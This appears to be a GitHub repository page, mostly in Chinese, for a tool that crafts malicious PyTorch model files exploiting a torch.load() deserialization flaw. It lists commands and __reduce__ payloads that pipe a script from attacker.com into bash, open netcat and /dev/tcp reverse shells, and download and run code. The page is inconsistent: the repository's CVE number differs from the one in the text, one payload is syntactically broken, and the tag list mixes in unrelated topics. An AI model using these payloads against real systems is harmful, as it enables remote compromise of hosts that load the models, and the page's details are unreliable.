B1tBit/CVE-2026-32201-exploit

GitHub: B1tBit/CVE-2026-32201-exploit

针对 PyTorch < 2.6.0 版本 torch.load() 反序列化漏洞的远程代码执行利用工具,可绕过 weights_only=True 安全限制生成恶意模型文件。

Stars: 0 | Forks: 0

# 概述 此漏洞利用演示了 PyTorch 版本 < 2.6.0 中存在的一个严重远程代码执行漏洞 (CVE-2025-32434)。该缺陷存在于 torch.load() 函数中,即使使用了旨在防止模型反序列化期间执行任意代码的 weights_only=True 参数,也无法幸免。 该漏洞的发生是因为 _weights_only_unpickler 的实现未能正确限制反序列化过程,使得攻击者可以精心构造恶意的 .pt 模型文件,当这些文件被存在漏洞的 PyTorch 环境加载时,会执行任意的系统命令。 **受影响版本:** PyTorch < 2.6.0 **CVSS 评分:** 严重 (估计 9.8) **影响:** 在加载该模型的主机上实现完整的 RCE # 使用方法 1. 将其保存为 CVE-2026-32201-exploit.py 2. 运行它以创建一个恶意模型文件: ``` # 基本用法 - 创建触及 /tmp/pwned 的模型 python3 exploit.py # 执行自定义命令 python3 exploit.py -c "id > /tmp/whoami" # 测试 exploit(加载模型以验证 RCE) python3 exploit.py -c "id" -t # 带有 alternative bypass 的高级 exploit 变体 python3 exploit.py --advanced -c "curl -s http://attacker.com/shell.sh | bash" -t # 保存到自定义文件名 python3 exploit.py -f evil_model.pt -c "nc -e /bin/sh attacker.com 4444" ``` 输出示例: ``` === CVE-2025-32434 PyTorch RCE Exploit === [*] Creating malicious PyTorch model... [+] Malicious model saved as 'malicious_model.pt' [+] Will execute command: touch /tmp/pwned [+] Created malicious model: malicious_model.pt [*] Testing exploit... [+] PyTorch version: 2.5.1+cu121 [+] Version is vulnerable to CVE-2025-32434 [*] Loading malicious model with weights_only=True... [*] This should be safe, but due to CVE-2025-32434 it's not! [+] Model loaded successfully ``` # 自定义设置 编辑 create_malicious_model() 或 create_advanced_exploit() 中的 __reduce__() 方法: ``` # 示例:Reverse shell payload class ExploitPayload: def __reduce__(self): return (eval, ("__import__('os').system('bash -i >& /dev/tcp/10.0.0.1/4444 0>&1')",)) # 示例:文件下载 + 执行 return (eval, ("__import__('urllib.request').urlopen('http://attacker.com/payload.sh').read().decode().strip() | __import__('os').system",)) ``` # 验证 检查目标漏洞 ``` import torch print(f"PyTorch: {torch.__version__}") # 若 < 2.6.0 则存在漏洞 ```
标签:CISA项目, CVE-2025-32434, CVE-2026-32201, CVSS 9.8, Go语言工具, Maven, PoC, Python, PyTorch, RCE, SharePoint, Weights Only Bypass, XSS, 不安全反序列化, 人工智能安全, 代码执行, 凭据扫描, 反射型XSS, 反序列化漏洞, 合规性, 命令注入, 密钥泄露防护, 恶意模型文件, 提权, 数据展示, 无后门, 暴力破解, 机器学习安全, 漏洞情报, 漏洞验证, 红队, 编程工具, 网络安全, 跨站脚本攻击, 远程代码执行, 逆向Shell, 逆向工具, 隐私保护